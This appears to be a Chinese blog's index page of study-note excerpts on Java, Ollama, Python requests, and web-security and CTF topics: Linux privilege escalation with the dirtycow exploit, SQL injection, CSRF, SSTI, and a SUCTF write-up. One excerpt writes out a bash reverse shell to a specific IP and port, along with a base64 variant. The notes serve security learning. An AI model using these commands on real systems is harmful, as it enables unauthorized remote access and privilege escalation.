8k7 分钟

简易版本,默认学过 C++,没写就是一样 java 程序是一系列对象的集合,是通过对象间的调用来协同的,所有的代码都必须封装到类中 大小写敏感 # 命名规范 1、 项目名全部小写 2、 包名全部小写 3、 类名首字母大写,如果类名由多个单词组成,每个单词的首字母都要大写。如:public class MyFirstClass{} 4、 变量名、方法名首字母小写,如果名称由多个单词组成,每个单词的首字母都要大写。 5、 常量名全部大写 PS:java 的标识符要求与 C++ 大致相同,不过 java 的可以是中文 # 注释规范 1、类注释 在每个类前面必须加上类注释,注释模板如下: /
2.4k2 分钟

Ollama 是一个开源的本地大语言模型框架,为本地部署 LLM 而设计 可以在 Docker 中运行,提供 CLI(命令行工具)以及 PythonSDK # 基本操作 # 模型管理 ollama pull <model-name>ollama run <model-name>//之后就可以直接交互,使用/bye或者`Ctrl+D`退出ollama status <model-name>//查看模型状态ollama listollama rm <model-name>ollama
8.4k8 分钟

最简单的就是猜一猜是不是和之前的密码是同一个 # 内核漏洞 在得到的shell上查询版本:uname -a在kali搜索该版本存在的漏洞:searchsploit linux 3.2.78下载后上传,可能需要编译:gcc -pthread 40839.c -o 40839 -lcrypt运行后可能会得到一个新的账户,切换过去:su firefart# SUID 配置 SUID(Set User ID)是 Linux/Unix 系统中的一种特殊权限,其作用是:当一个文件被设置了 SUID 权限,用户执行该文件时,会临时获得文件所有者的权限 例如 passwd 命令的所有者是 root
20k18 分钟

最最最最最基础简单的部分 (虽然它简单但是不等于我记得,更不等于我会.jpg) SQL 提权见 linux 提权 # 基本语句 先明确一件事,所有的查询语句,查的都是数据,而不是字段之类 select database() //这是查当前数据库,如果是要查所有,是; select group_concat(schema_name) from information_schema.schemate才对 注意,只有在information_schema.schemate中才存在字段schema_name,在其他两个表中都会叫做table_schema,但是在informati
12k11 分钟

重置未完 # requests # 请求 基本用法: r.text 就是整个响应。get 传的参数直接写 url 里,或者传个字典 (params=...)。 type (r.text) 为 str,且是 json 格式(反正不是就会报错,试一试总是好的.jpg),可以使用 r.json (),将其转化为字典。 其他方法: post 传参此时就只能传字典,data=... 在请求体中位于 form 部分 # 设置请求头 也是传字典,headers=... # 响应 其中 r.context 就是网页源码 # 爬取二进制数据 网页上传输的非文本都是用的二进
1.5k1 分钟

CSRF 跨站请求伪造,与 XSS 不同,XSS 是利用站内信任用户而 CSRF 是伪装信任用户(当网站使用 cookie 标明身份时,在用户没有登出该网站的情况下访问其他危险网站,危险网站使用其在该网站上的 cookie 伪装成用户发起请求)。 所以前提是:本地生成 Cookie, 不登出就访问危险网站 # GET 例子: # POST 大多 CSRF 用的都是 <img>,<iframe>,<script > 这种带 src 属性的标签,这类标签只能发出一次 GET 请求。 所以如果是使用 POST 方法进行传参的网站: 在后端的参数是_$REQUES
8.6k8 分钟

SSTI (服务器端模板注入,Server-Side Template Injection) 由于不知道哪里的 bug,查看图片需要在检查中手动把 data-src 改成 src # 介绍 漏洞成因是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 凡是使用模板的地方都可能会出现 SSTI 的问题,这不是模版引擎导致的问题。 以 PHP 模版引擎 Twig 为例: <?php  require_once dirna
8911 分钟

# 反弹 shell bash: bash -i >& /dev/tcp/118.31.3.26/10086 0>&1//-i 表示交互模式,>&将标准输出以及错误重定向,/dev...是使用特殊文件进行tcp连接,0>&1是将标准输入重定向。注意:0是标准输入,1是标准输出,2是标准错误。>&是组合操作符,同时操作标准输出和错误,也可以指定。base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3Rjc
13k12 分钟

# [SUCTF 2019]EasySQL buu 上的,百度下有题解,这里说点有趣的 关于最后 payload 还有查询语句: select $_GET['query'] || flag from Flag //这道题最核心的就是猜出这个语句来 这里的 II 应该是逻辑或,当使用任意一个数字(常数列)与其或时,返回的只会是常数列。所以 payload 是 *,任意数字 ,因为 *||flag 是非法的,即使是开启了所谓的字符串拼接也是不对的。 但是似乎这道题其实没有开字符串拼接,输入 *,1 返回的是: Array ( [0] =>